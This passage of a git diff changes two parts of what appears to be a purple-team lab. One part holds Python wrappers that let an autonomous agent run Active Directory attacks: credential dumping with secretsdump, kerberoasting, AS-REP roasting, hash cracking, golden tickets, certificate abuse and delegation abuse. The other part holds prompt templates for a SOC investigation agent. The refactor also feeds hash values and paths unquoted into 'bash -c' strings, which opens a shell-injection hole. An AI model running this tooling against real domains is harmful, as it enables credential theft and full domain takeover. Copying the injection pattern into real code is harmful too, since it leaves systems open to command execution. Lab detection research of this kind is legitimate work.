no_pass: bool = False,
- timeout_minutes: int = 10,
+ timeout_minutes: int = 3,
+ connection_timeout: int = 30,
+ skip_connectivity_check: bool = False,
) -> str:
"""
Extract secrets using impacket-secretsdump for credential harvesting.
@@ -210,18 +241,32 @@ def secretsdump(
password: Password for the username (optional)
hash: NTLM hash for pass-the-hash authentication (optional)
domain: Domain name (optional, can be inferred)
+ dc_ip: Domain controller IP address (recommended for DC targets to avoid DNS issues)
no_pass: If True, use Kerberos golden ticket authentication
- timeout_minutes: Maximum time to spend dumping (default: 10)
+ timeout_minutes: Maximum time to spend dumping (default: 3)
+ connection_timeout: Timeout for initial SMB connection in seconds (default: 30)
+ skip_connectivity_check: Skip the SMB port check (default: False)
Returns:
Extracted credentials including NTLM hashes, Kerberos keys, and secrets
Example:
>>> secretsdump("192.168.1.100", "Administrator", password="P@ssw0rd") # pragma: allowlist secret
- >>> secretsdump("192.168.1.100", "Administrator", hash="aad3b4...", domain="DOMAIN")
+ >>> secretsdump("192.168.1.100", "Administrator", hash="aad3b4...", domain="DOMAIN", dc_ip="192.168.1.100")
>>> secretsdump("domain.local", "Administrator", no_pass=True) # golden ticket
"""
- cmd = ["/usr/bin/impacket-secretsdump"]
+ # Pre-check SMB connectivity to fail fast
+ if not skip_connectivity_check:
+ is_reachable, error_msg = self._check_smb_connectivity(target)
+ if not is_reachable:
+ return f"[!] Target {target} is not reachable on SMB port 445. {error_msg}"
+
+ # Use timeout command to enforce connection-level timeout
+ cmd = ["timeout", str(connection_timeout), "impacket-secretsdump"]
+
+ # Add dc-ip flag if provided (helps avoid DNS resolution hangs)
+ if dc_ip:
+ cmd.extend(["-dc-ip", dc_ip])
if password and domain:
target_string = f"{domain}/{username}:{password}@{target}"
@@ -241,27 +286,22 @@ def secretsdump(
cmd.append(target_string)
+ # For golden ticket auth, set KRB5CCNAME in the command
+ if no_pass:
+ cmd = ["env", "KRB5CCNAME=Administrator.ccache"] + cmd
+
try:
logger.info(f"[*] Running secretsdump on {target} with {username}")
- env = os.environ.copy() if no_pass else None
- if no_pass and env is not None:
- env["KRB5CCNAME"] = "Administrator.ccache"
-
- result = subprocess.run(
- cmd,
- check=False,
- capture_output=True,
- text=True,
- timeout=timeout_minutes * 60,
- env=env,
- )
+ stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=timeout_minutes * 60)
+
+ # Check for timeout exit code (124 from timeout command)
+ if returncode == 124:
+ return f"[!] Secretsdump timed out after {connection_timeout}s connecting to {target}. Target may be unreachable or credentials invalid."
logger.info(f"[*] Secretsdump completed for {target}")
- return result.stdout
+ return stdout or stderr or f"Secretsdump returned code {returncode}"
- except subprocess.TimeoutExpired:
- return "[!] Secretsdump timed out"
except Exception as e:
return f"[!] Secretsdump error: {e}"
@@ -293,7 +333,7 @@ def kerberoast(
>>> kerberoast("example.local", "user", "pass", "192.168.1.100")
"""
cmd = [
- "/usr/bin/impacket-GetUserSPNs",
+ "impacket-GetUserSPNs",
f"{domain}/{username}:{password}",
"-dc-ip",
dc_ip,
@@ -302,11 +342,9 @@ def kerberoast(
try:
logger.info(f"[*] Kerberoasting {domain} using {username}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60)
- return result.stdout
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60)
+ return stdout or stderr
- except subprocess.TimeoutExpired:
- return "Error: Kerberoasting timed out"
except Exception as e:
return f"Kerberoasting failed: {e!s}"
@@ -338,7 +376,7 @@ def asrep_roast(
>>> asrep_roast("example.local", "user", "pass", "192.168.1.100")
"""
cmd = [
- "/usr/bin/impacket-GetNPUsers",
+ "impacket-GetNPUsers",
f"{domain}/{username}:{password}",
"-dc-ip",
dc_ip,
@@ -347,11 +385,9 @@ def asrep_roast(
try:
logger.info(f"[*] AS-REP roasting {domain} using {username}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60)
- return result.stdout
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60)
+ return stdout or stderr
- except subprocess.TimeoutExpired:
- return "Error: AS-REP roasting timed out"
except Exception as e:
return f"AS-REP roasting failed: {e!s}"
@@ -397,19 +433,15 @@ def domain_admin_checker(
cmd.extend(["-x", "whoami"])
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
- output = ""
- if result.stdout:
- output += result.stdout
- if result.stderr:
- output += "\n" + result.stderr if output else result.stderr
+ output = stdout
+ if stderr:
+ output += "\n" + stderr if output else stderr
logger.info(f"[*] Domain admin check completed for {targets}")
return output
- except subprocess.TimeoutExpired:
- return f"Domain admin checker timed out for {targets}"
except Exception as e:
logger.error(f"Domain admin checker failed: {e}")
return f"Domain admin checker failed: {e}"
@@ -458,57 +490,30 @@ def crack_with_hashcat(
"""
output = "[*] Starting hashcat...\n"
- try:
- with tempfile.NamedTemporaryFile(mode="w", suffix=".hash", delete=False) as hash_file:
- hash_file.write(hash_value)
- hash_file_path = hash_file.name
-
- try:
- cmd = [
- "hashcat",
- "-m",
- str(hashcat_mode),
- "-a",
- "0",
- hash_file_path,
- wordlist_path,
- "--runtime",
- str(max_time_minutes * 60),
- "--force",
- ]
-
- _result = subprocess.run(
- cmd,
- check=False,
- capture_output=True,
- text=True,
- timeout=(max_time_minutes * 60) + 30,
- )
+ # Create hash file remotely and run hashcat
+ hash_file_path = f"/tmp/hash_{time.time()}.hash" # noqa: S108 # nosec B108
- show_cmd = ["hashcat", "-m", str(hashcat_mode), hash_file_path, "--show"]
-
- show_result = subprocess.run(
- show_cmd,
- check=False,
- capture_output=True,
- text=True,
- timeout=30,
- )
-
- if show_result.stdout.strip():
- output += "\n✓ CRACKED PASSWORDS:\n" + show_result.stdout
- logger.info("[+] Hashcat successfully cracked hash")
- else:
- output += "\n✗ No passwords cracked"
+ try:
+ # Write hash to remote file and run hashcat
+ cmd = f"""
+echo '{hash_value}' > {hash_file_path}
+hashcat -m {hashcat_mode} -a 0 {hash_file_path} {wordlist_path} --runtime {max_time_minutes * 60} --force 2>&1 || true
+hashcat -m {hashcat_mode} {hash_file_path} --show 2>&1
+rm -f {hash_file_path}
+"""
+ stdout, stderr, _ = _run_tool(
+ ["bash", "-c", cmd],
+ timeout_seconds=(max_time_minutes * 60) + 60,
+ )
- return output
+ if stdout and ":" in stdout:
+ output += "\n✓ CRACKED PASSWORDS:\n" + stdout
+ logger.info("[+] Hashcat successfully cracked hash")
+ else:
+ output += "\n✗ No passwords cracked\n" + (stdout or stderr)
- finally:
- if os.path.exists(hash_file_path):
- os.unlink(hash_file_path)
+ return output
- except subprocess.TimeoutExpired:
- return output + "\nError: Hashcat timed out"
except Exception as e:
return output + f"\nError: {e!s}"
@@ -546,65 +551,30 @@ def crack_with_john(
"""
output = "[*] Starting John the Ripper...\n"
- try:
- with tempfile.NamedTemporaryFile(mode="w", suffix=".hash", delete=False) as hash_file:
- hash_file.write(hash_value)
- hash_file_path = hash_file.name
-
- try:
- session_name = f"john_session_{int(time.time())}"
- cmd = [
- "john",
- "--wordlist=" + wordlist_path,
- "--format=" + hash_format,
- hash_file_path,
- "--session=" + session_name,
- ]
-
- subprocess.run(
- cmd,
- check=False,
- capture_output=True,
- text=True,
- timeout=(max_time_minutes * 60) + 30,
- )
-
- show_cmd = ["john", "--show", "--format=" + hash_format, hash_file_path]
-
- show_result = subprocess.run(
- show_cmd,
- check=False,
- capture_output=True,
- text=True,
- timeout=30,
- )
+ hash_file_path = f"/tmp/john_hash_{time.time()}.hash" # noqa: S108 # nosec B108
+ session_name = f"john_session_{int(time.time())}"
- if show_result.stdout.strip():
- output += "\n✓ CRACKED PASSWORDS:\n" + show_result.stdout
- logger.info("[+] John successfully cracked hash")
- else:
- output += "\n✗ No passwords cracked"
+ try:
+ # Write hash to remote file and run john
+ cmd = f"""
+echo '{hash_value}' > {hash_file_path}
+john --wordlist={wordlist_path} --format={hash_format} {hash_file_path} --session={session_name} 2>&1 || true
+john --show --format={hash_format} {hash_file_path} 2>&1
+rm -f {hash_file_path} {session_name}.pot {session_name}.rec {session_name}.log
+"""
+ stdout, stderr, _ = _run_tool(
+ ["bash", "-c", cmd],
+ timeout_seconds=(max_time_minutes * 60) + 60,
+ )
- return output
+ if stdout and ":" in stdout:
+ output += "\n✓ CRACKED PASSWORDS:\n" + stdout
+ logger.info("[+] John successfully cracked hash")
+ else:
+ output += "\n✗ No passwords cracked\n" + (stdout or stderr)
- finally:
- if os.path.exists(hash_file_path):
- os.unlink(hash_file_path)
+ return output
- session_files = [
- f"{session_name}.pot",
- f"{session_name}.rec",
- f"{session_name}.log",
- ]
- for session_file in session_files:
- if os.path.exists(session_file):
- try:
- os.unlink(session_file)
- except Exception:
- pass
-
- except subprocess.TimeoutExpired:
- return output + "\nError: John the Ripper timed out"
except Exception as e:
return output + f"\nError: {e!s}"
@@ -658,17 +628,14 @@ def enumerate_share_files(
]
logger.info(f"[*] Enumerating files in {share_path}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=120)
- if result.returncode != 0:
- logger.error(f"[!] Failed to list files: {result.stderr}")
- return f"Failed to list files: {result.stderr}"
+ if returncode != 0:
+ logger.error(f"[!] Failed to list files: {stderr}")
+ return f"Failed to list files: {stderr}"
- return result.stdout
+ return stdout
- except subprocess.TimeoutExpired:
- logger.error(f"[!] File enumeration timed out for {share_path}")
- return "File enumeration timed out"
except Exception as e:
logger.error(f"[!] Error during enumeration: {e!s}")
return f"Error during enumeration: {e!s}"
@@ -719,13 +686,13 @@ def download_file_content(
]
logger.info(f"[*] Downloading {file_path} from {share_path}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60)
+ stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=60)
- if result.returncode != 0:
- logger.error(f"[!] Failed to download file: {result.stderr}")
- return f"Failed to download file: {result.stderr}"
+ if returncode != 0:
+ logger.error(f"[!] Failed to download file: {stderr}")
+ return f"Failed to download file: {stderr}"
- content = result.stdout
+ content = stdout
logger.info(f"[+] Downloaded {len(content)} bytes from {file_path}")
# Log that share was accessed
@@ -734,9 +701,6 @@ def download_file_content(
return content
- except subprocess.TimeoutExpired:
- logger.error(f"[!] File download timed out for {file_path}")
- return "File download timed out"
except Exception as e:
logger.error(f"[!] Error downloading file: {e!s}")
return f"Error downloading file: {e!s}"
@@ -787,11 +751,9 @@ def get_sid(
logger.info(f"[*] Getting SID for {domain} using {username}")
try:
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
logger.info(f"[*] SID lookup completed for {domain}")
- return result.stdout
- except subprocess.TimeoutExpired:
- return "Error: SID lookup timed out"
+ return stdout or stderr
except Exception as e:
return f"Error: {e!s}"
@@ -847,7 +809,7 @@ def generate_golden_ticket(
try:
logger.info("[*] Generating golden ticket for Administrator")
logger.info(f"[*] Domain: {domain}, SID: {domain_sid}, Extra SID: {extra_sid}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
if self.state:
self.state.has_golden_ticket = True
@@ -862,9 +824,7 @@ def generate_golden_ticket(
)
self.state.timeline.append(event)
- return result.stdout
- except subprocess.TimeoutExpired:
- return "Error: Golden ticket generation timed out"
+ return stdout or stderr
except Exception as e:
return f"Error: {e!s}"
@@ -925,13 +885,11 @@ def run_bloodhound(
try:
logger.info(f"[*] Running BloodHound collection for {domain}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=600)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=600)
logger.info("[+] BloodHound collection completed")
- return result.stdout + "\n" + result.stderr
+ return stdout + "\n" + (stderr or "")
- except subprocess.TimeoutExpired:
- return "BloodHound collection timed out after 10 minutes"
except Exception as e:
logger.error(f"BloodHound failed: {e}")
return f"BloodHound failed: {e}"
@@ -993,15 +951,13 @@ def certipy_find(
try:
logger.info(f"[*] Enumerating ADCS for {domain}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=300)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=300)
- if "ESC" in result.stdout:
+ if "ESC" in stdout:
logger.warning("[!] VULNERABLE CERTIFICATE TEMPLATES FOUND!")
- return result.stdout + "\n" + result.stderr
+ return stdout + "\n" + (stderr or "")
- except subprocess.TimeoutExpired:
- return "Certipy enumeration timed out"
except Exception as e:
return f"Certipy enumeration failed: {e}"
@@ -1058,15 +1014,13 @@ def certipy_req_esc1(
try:
logger.info(f"[*] Requesting certificate for {target_upn} via ESC1")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
- if "saved" in result.stdout.lower():
+ if "saved" in stdout.lower():
logger.info("[+] Certificate obtained! Use certipy_auth next.")
- return result.stdout + "\n" + result.stderr
+ return stdout + "\n" + (stderr or "")
- except subprocess.TimeoutExpired:
- return "Certificate request timed out"
except Exception as e:
return f"Certificate request failed: {e}"
@@ -1092,15 +1046,13 @@ def certipy_auth(self, pfx_path: str, dc_ip: str) -> str:
try:
logger.info("[*] Authenticating with certificate")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60)
- if "hash" in result.stdout.lower():
+ if "hash" in stdout.lower():
logger.info("[+] NTLM hash obtained! Run domain_admin_checker.")
- return result.stdout + "\n" + result.stderr
+ return stdout + "\n" + (stderr or "")
- except subprocess.TimeoutExpired:
- return "Certificate authentication timed out"
except Exception as e:
return f"Certificate authentication failed: {e}"
@@ -1151,10 +1103,8 @@ def find_delegation(
try:
logger.info(f"[*] Searching for delegation in {domain}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
- return result.stdout
- except subprocess.TimeoutExpired:
- return "Delegation search timed out"
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
+ return stdout or stderr
except Exception as e:
return f"Delegation search failed: {e}"
@@ -1200,11 +1150,9 @@ def add_computer(
try:
logger.info(f"[*] Adding computer account {computer_name}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60)
logger.info(f"[+] Computer account {computer_name}$ created")
- return result.stdout
- except subprocess.TimeoutExpired:
- return "Computer account creation timed out"
+ return stdout or stderr
except Exception as e:
return f"Computer account creation failed: {e}"
@@ -1252,11 +1200,9 @@ def rbcd_write(
try:
logger.info(f"[*] Configuring RBCD: {delegate_from} -> {delegate_to}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
logger.info("[+] RBCD configured - use get_st next")
- return result.stdout
- except subprocess.TimeoutExpired:
- return "RBCD configuration timed out"
+ return stdout or stderr
except Exception as e:
return f"RBCD configuration failed: {e}"
@@ -1302,14 +1248,12 @@ def get_st(
try:
logger.info(f"[*] Requesting ST for {target_spn} as {impersonate_user}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
- if ".ccache" in result.stdout:
+ if ".ccache" in stdout:
logger.info("[+] Ticket obtained! Export KRB5CCNAME and use secretsdump -k")
- return result.stdout
- except subprocess.TimeoutExpired:
- return "Service ticket request timed out"
+ return stdout or stderr
except Exception as e:
return f"Service ticket request failed: {e}"
@@ -1449,11 +1393,67 @@ def record_finding(
return f"✓ Recorded share: {share.name} on {share.host}"
if finding_type == "admin_access":
+ details = data.get("details", "")
+
+ # Validate that this is actually a success, not an error being misreported
+ error_indicators = [
+ "not found",
+ "not available",
+ "not installed",
+ "not in path",
+ "missing",
+ "failed",
+ "error",
+ "cannot",
+ "unable",
+ "timed out",
+ "timeout",
+ "not properly configured",
+ "command not found",
+ "no such file",
+ "permission denied",
+ ]
+ details_lower = details.lower()
+
+ for indicator in error_indicators:
+ if indicator in details_lower:
+ logger.warning(
+ f"[!] Rejecting admin_access finding - details contain error indicator '{indicator}': {details[:200]}"
+ )
+ return (
+ f"[!] REJECTED: Cannot record admin_access with error details. "
+ f"The details contain '{indicator}' which indicates a failure, not success. "
+ f"Only call record_finding('admin_access') when you have CONFIRMED admin access "
+ f"(e.g., 'Pwn3d!' in netexec output, successful secretsdump, etc.). "
+ f"If tools are missing or not working, troubleshoot the environment first."
+ )
+
+ # Require some positive indicator of success
+ success_indicators = [
+ "pwn3d",
+ "admin",
+ "success",
+ "authenticated",
+ "dumped",
+ "obtained",
+ ]
+ has_success_indicator = any(ind in details_lower for ind in success_indicators)
+
+ if not has_success_indicator and len(details) > 0:
+ logger.warning(
+ f"[!] Admin access claim lacks success indicators: {details[:200]}"
+ )
+ return (
+ "[!] REJECTED: admin_access finding should include evidence of success "
+ "(e.g., 'Pwn3d!' output, successful authentication, dumped credentials). "
+ "Provide specific details showing HOW admin access was confirmed."
+ )
+
self.state.has_domain_admin = True
event = TimelineEvent(
id=f"evt-{len(self.state.timeline):04d}",
timestamp=datetime.now(timezone.utc),
- description=f"Domain admin access achieved: {data.get('details', '')}",
+ description=f"Domain admin access achieved: {details}",
mitre_techniques=["T1078.002"], # Domain Accounts
confidence=1.0,
source="domain_admin_checker",
diff --git a/templates/agent/initial_alert_prompt.md.jinja b/templates/agent/initial_alert_prompt.md.jinja
index 6c23cb89..3293af07 100644
--- a/templates/agent/initial_alert_prompt.md.jinja
+++ b/templates/agent/initial_alert_prompt.md.jinja
@@ -104,11 +104,25 @@ mcp__grafana__query_loki_logs(
If no results, try broader queries but ALWAYS use the time range above.
**CRITICAL**: After EVERY query (whether it returns results or not), you MUST:
-1. If results found: Call record_evidence() for EACH user/host/IP/process/finding
+1. If results found: **PARSE THE JSON** and call record_evidence() for EACH user/host/IP/process found
2. If NO results: Document this and either try a broader query OR move forward with get_combined_questions()
3. DO NOT query multiple times without calling record_evidence() or get_combined_questions()
-**YOU ARE STUCK IN A LOOP IF**: You make 3+ queries without calling record_evidence() or get_combined_questions()
+**YOU ARE STUCK IN A LOOP IF**: You make 2+ queries without calling record_evidence()
+
+## How to Parse Query Results
+
+Loki returns JSON like this:
+```json
+{"line": "{\"computer\":\"winterfell.north.sevenkingdoms.local\", \"event_data\":\"<Data Name='TargetUserName'>robb.stark</Data><Data Name='IpAddress'>10.0.4.186</Data>\"}"}
+```
+
+**EXTRACT AND RECORD:**
+- `computer` field → record_evidence(evidence_type="hostname", value="winterfell...")
+- `TargetUserName` from event_data → record_evidence(evidence_type="user", value="robb.stark")
+- `IpAddress` from event_data → record_evidence(evidence_type="ip", value="10.0.4.186")
+
+**DO NOT** re-run the same query. **DO** parse results and extract IOCs.
---
@@ -161,12 +175,10 @@ If no results, try broader queries but ALWAYS use the time range above.
18. ☐ Call transition_stage("synthesis")
### Stage 4: SYNTHESIS
-19. ☐ Call complete_investigation() with ALL required fields
-
-**DO NOT complete the investigation until you have:**
-- Identified specific affected hosts (including ALL domain controllers)
-- Identified ALL compromised user accounts
-- Investigated precursor techniques (enumeration, credential access)
-- Created a complete timeline from initial access to detected attack
-- Recorded at least 5 evidence items covering the full attack chain
-- Mapped the attack to multiple MITRE techniques (not just the alert technique)
+19. ☐ Call complete_investigation(summary="...") with a summary of your findings
+
+**Complete the investigation when you have:**
+- Investigated the alert and recorded evidence
+- Identified affected hosts and users
+- Built a timeline of events
+- Can provide recommendations
diff --git a/templates/agent/system_instructions.md.jinja b/templates/agent/system_instructions.md.jinja
index 8f073c9a..044d99a4 100644
--- a/templates/agent/system_instructions.md.jinja
+++ b/templates/agent/system_instructions.md.jinja
@@ -1,6 +1,22 @@
You are Ares, an autonomous SOC investigation agent. Your mission is to investigate
-security alerts and produce actionable threat intelligence through systematic,
-question-driven investigation.
+security alerts and produce actionable threat intelligence.
+
+## 🛑 CRITICAL: COMPLETE QUICKLY
+
+**You have LIMITED steps. Do NOT loop endlessly on queries.**
+
+1. Query logs (2-3 queries max)
+2. Record any findings with record_evidence()
+3. Call complete_investigation(summary="...") with your findings
+
+If queries return empty results, that IS a finding. Complete with:
+```
+complete_investigation(summary="Investigated [alert]. No matching events found in logs.
+Recommend continued monitoring. Confidence: Low - no data to confirm or deny.")
+```
+
+**ANTI-PATTERN**: Making 3+ queries without calling complete_investigation()
+**CORRECT PATTERN**: Query → Record findings → Complete
## Core Investigation Philosophy
@@ -95,16 +111,51 @@ The alert's `startsAt` timestamp is likely STALE. The initial prompt provides:
**DO NOT skip this stage. If you only detect the final attack without precursors,
your investigation is INCOMPLETE.**
-### Stage 3: LATERAL (What is the SCOPE?)
+### Stage 3: LATERAL (What is the SCOPE?) - CRITICAL FOR HIGH/CRITICAL ALERTS
+
+For HIGH and CRITICAL severity alerts, you MUST perform lateral investigation.
+
1. Call get_combined_questions() for scope questions
-2. Use track_host_investigation() and track_user_investigation()
-3. Check these dimensions in PARALLEL:
+2. Use track_host_investigation() and track_user_investigation() for EACH entity
+3. **MANDATORY LATERAL QUERIES:**
+
+**For each user discovered:**
+```
+{job=~".+"} |~ "(?i)<username>"
+```
+- What other hosts did this user access?
+- What other activities did this user perform?
+- Were there failed login attempts before success?
+
+**For each host discovered:**
+```
+{job=~".+"} |~ "(?i)<hostname>"
+```
+- What other users logged into this host?
+- What processes were executed on this host?
+- What network connections were made?
+
+**For each IP discovered:**
+```
+{job=~".+"} |~ "<ip_address>"
+```
+- What other hosts communicated with this IP?
+- What services were accessed from this IP?
+- Is this IP associated with multiple users?
+
+4. Check these dimensions in PARALLEL:
- Same host: What else is this host doing?
- Same user: Where else has this user been?
- Same indicators: Where else do these IOCs appear?
- Same timeframe: What else happened during this window?
-4. Expand or contract scope based on findings
-5. Call transition_stage("synthesis")
+
+5. **Build a scope map:**
+ - List ALL compromised/affected hosts
+ - List ALL compromised/affected users
+ - Identify the attack origin point
+ - Identify the furthest point of lateral movement
+
+6. Call transition_stage("synthesis")
### Stage 4: SYNTHESIS (Generate report)
1. Call get_investigation_summary() to review findings
@@ -246,7 +297,28 @@ data sources. These tools include:
- Check stats before running large queries
- Prefer MCP tools when available as they're more reliable than HTTP API calls
-## Evidence Recording
+## Evidence Recording (CRITICAL - DO NOT SKIP)
+
+**You MUST extract and record ALL IOCs from query results.** For EVERY finding, call record_evidence().
+
+### IOC Extraction Checklist
+
+When you get query results, extract and record EACH of these:
+
+| IOC Type | What to Look For | Pyramid Level |
+|----------|------------------|---------------|
+| **ip** | Source IPs, destination IPs, client IPs | 2 |
+| **user** | Usernames, account names, service accounts | 4 |
+| **hostname** | Computer names, server names, DC names | 4 |
+| **domain** | Domain names, FQDNs | 3 |
+| **process** | Process names, command lines | 4 |
+| **file** | File paths, file names | 4 |
+| **hash** | MD5, SHA1, SHA256 hashes | 1 |
+| **artifact** | Registry keys, scheduled tasks, services | 4 |
+| **tool** | Attack tools (mimikatz, rubeus, etc.) | 5 |
+| **technique** | MITRE ATT&CK technique ID | 6 |
+
+### record_evidence() Parameters
For EVERY finding, call record_evidence() with:
1. evidence_type: ip, domain, hash, process, user, file, artifact, tool, technique
@@ -256,14 +328,202 @@ For EVERY finding, call record_evidence() with:
5. pyramid_level: 1-6 (6 = TTP, the goal!)
6. mitre_techniques: List of technique IDs if known
+### Example: Extracting IOCs from DCSync Detection
+
+If you find a DCSync event, record MULTIPLE evidence items:
+
+```python
+# Record the technique (level 6 - TTP)
+record_evidence(
+ evidence_type="technique",
+ value="T1003.006 - DCSync",
+ source="Loki query: Event 4662",
+ timestamp="2026-01-10T14:30:00Z",
+ pyramid_level=6,
+ mitre_techniques=["T1003.006"]
+)
+
+# Record the attacking user (level 4)
+record_evidence(
+ evidence_type="user",
+ value="robb.stark",
+ source="Event 4662 SubjectUserName field",
+ timestamp="2026-01-10T14:30:00Z",
+ pyramid_level=4,
+ mitre_techniques=["T1003.006"]
+)
+
+# Record the source host (level 4)
+record_evidence(
+ evidence_type="hostname",
+ value="winterfell.north.sevenkingdoms.local",
+ source="Event 4662 SubjectLogonId correlated with 4624",
+ timestamp="2026-01-10T14:30:00Z",
+ pyramid_level=4,
+ mitre_techniques=["T1003.006"]
+)
+
+# Record the source IP (level 2)
+record_evidence(
+ evidence_type="ip",
+ value="10.0.4.186",
+ source="Event 4624 IpAddress field",
+ timestamp="2026-01-10T14:30:00Z",
+ pyramid_level=2,
+ mitre_techniques=["T1003.006"]
+)
+```
+
+**DO NOT just record the technique - record ALL associated IOCs!**
+
+## Parsing Loki Query Results (CRITICAL)
+
+Loki returns structured JSON with embedded Windows Event data. You MUST parse these results.
+
+### Loki Response Structure
+
+Each result contains:
+```json
+{
+ "timestamp": "...",
+ "line": "{\"computer\":\"hostname\", \"event_id\":4624, \"event_data\":\"...\"}",
+ "labels": {"host": "...", "deployment": "..."}
+}
+```
+
+### Extracting IOCs from Results
+
+**Step 1: Parse the `line` field as JSON**
+The `line` field contains the actual log entry with:
+- `computer`: The hostname (e.g., "winterfell.north.sevenkingdoms.local")
+- `event_id`: Windows Event ID
+- `event_data`: XML containing user/IP/SID data
+- `message`: Human-readable event description
+
+**Step 2: Extract from `event_data` XML**
+Look for these XML patterns:
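+- `<Data Name='TargetUserName'>username</Data>` → Record as user
+- `<Data Name='SubjectUserName'>username</Data>` → Record as user
+- `<Data Name='IpAddress'>10.0.4.186</Data>` → Record as IP
+- `<Data Name='WorkstationName'>hostname</Data>` → Record as hostname
+- `<Data Name='TargetDomainName'>DOMAIN</Data>` → Record as domain
+- `<Data Name='ProcessName'>C:\path\exe</Data>` → Record as process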
+
+**Step 3: Extract from `labels`**
+- `host`: Source hostname
+- `computer`: Full FQDN
+- `deployment`: Environment identifier
+
+### Example: Parsing a 4624 Logon Event
+
+If query returns:
+```
+computer: winterfell.north.sevenkingdoms.local
+event_data: <Data Name='TargetUserName'>robb.stark</Data>
+            <Data Name='IpAddress'>10.0.4.186</Data>
+```
+
+You MUST call:
+```python
+record_evidence(evidence_type="hostname", value="winterfell.north.sevenkingdoms.local", ...)
+record_evidence(evidence_type="user", value="robb.stark", ...)
+record_evidence(evidence_type="ip", value="10.0.4.186", ...)
+```
+
+### Common Windows Event Fields by Event ID
+
+| Event ID | Key Fields to Extract |
+|----------|----------------------|
+| 4624 (Logon) | TargetUserName, IpAddress, WorkstationName, LogonType |
+| 4625 (Failed Logon) | TargetUserName, IpAddress, FailureReason |
+| 4662 (Object Access) | SubjectUserName, ObjectName, AccessMask |
+| 4728/4732 (Group Add) | MemberName, TargetUserName (group), SubjectUserName |
+| 4768 (TGT Request) | TargetUserName, IpAddress, ServiceName |
+| 4769 (TGS Request) | TargetUserName, ServiceName, IpAddress, TicketEncryptionType |
+
+**ANTI-PATTERN**: Getting query results and immediately querying again without extracting IOCs
+**CORRECT PATTERN**: Get results → Parse JSON → Extract each IOC → record_evidence() for each → Then query again if needed
+
## Completion Criteria
-Call complete_investigation() when:
-1. get_combined_questions() returns no high-priority questions
-2. You have TTPs identified (pyramid level 6)
-3. Tactical coverage is reasonable (checked major attack phases)
-4. Timeline is coherent
-5. Scope is understood
+Call complete_investigation(summary, attack_synopsis, recommendations) when:
+1. You have investigated the alert and recorded evidence
+2. You understand what happened (attack type, affected hosts/users)
+3. You can provide recommendations
+
+### Summary Requirements
+
+The **summary** should include:
+- What attack/activity was detected
+- Key findings and affected hosts/users
+- Confidence level
+
+### Attack Synopsis Requirements (CRITICAL)
+
+The **attack_synopsis** is a narrative describing the attack chain. It should:
+- Describe the attack from start to finish in chronological order
+- Include specific hostnames, usernames, IPs, and timestamps
+- Explain how the attacker progressed (what they did first, second, etc.)
+- Connect the dots between evidence pieces
+
+**Good Synopsis Example:**
+```
+"On 2026-01-10 at 14:30 UTC, attacker from IP 10.0.4.186 began password spraying
+against domain accounts. After 47 failed attempts, they successfully authenticated
+as arya.stark at 14:45. Using these credentials, they accessed SYSVOL share on
+DC01 at 14:52 to harvest GPP passwords. At 15:10, they executed DCSync from
+workstation WS-042, extracting the krbtgt hash. Total time from initial access
+to domain compromise: 40 minutes."
+```
+
+**Bad Synopsis Example:**
+```
+"DCSync attack detected." (Too vague, no details)
+```
+
+### Recommendations Requirements (CRITICAL)
+
+The **recommendations** list should include:
+1. **Extract from alert annotations**: The alert's `response` annotation contains expert-written response steps - USE THEM
+2. **Add investigation-specific findings**: Based on what you discovered
+3. **Prioritize by severity**: Critical actions first
+
+**Always check the alert annotations for:**
+- `response`: Contains step-by-step remediation guidance
+- `summary`: Contains concise attack description
+- `description`: Contains detailed attack explanation
+
+Example with all three parameters:
+```
+complete_investigation(
+ summary="Detected DCSync attack. User robb.stark executed replication requests "
+ "from winterfell.north.sevenkingdoms.local. NTLM hashes exfiltrated for "
+ "multiple domain accounts. Confidence: High based on Event 4662 correlation.",
+ attack_synopsis="Initial access occurred via password spray at 14:30 UTC with "
+ "47 failed logons against 12 accounts. Successful authentication "
+ "as robb.stark at 14:45. SYSVOL accessed at 14:52. DCSync executed "
+ "at 15:10 targeting krbtgt and Administrator accounts.",
+ recommendations=[
+ "IMMEDIATE: Reset krbtgt password twice (10 hours apart)",
+ "IMMEDIATE: Reset all compromised account passwords",
+ "Isolate source host winterfell.north.sevenkingdoms.local",
+ "Block source IP at network perimeter",
+ "Hunt for golden ticket usage (Event 4769 with RC4)",
+ "Review all privileged account access in past 24 hours"
+ ]
+)
+```
+
+### Timeline Building (MANDATORY)
+
+You MUST call add_timeline_event() for EVERY significant event discovered:
+- Authentication events (successful and failed)
+- Share access events
+- Privilege escalation events
+- Lateral movement events
+- Data exfiltration indicators
+
+**Even if you only have the alert timestamp**, create a timeline event for it.
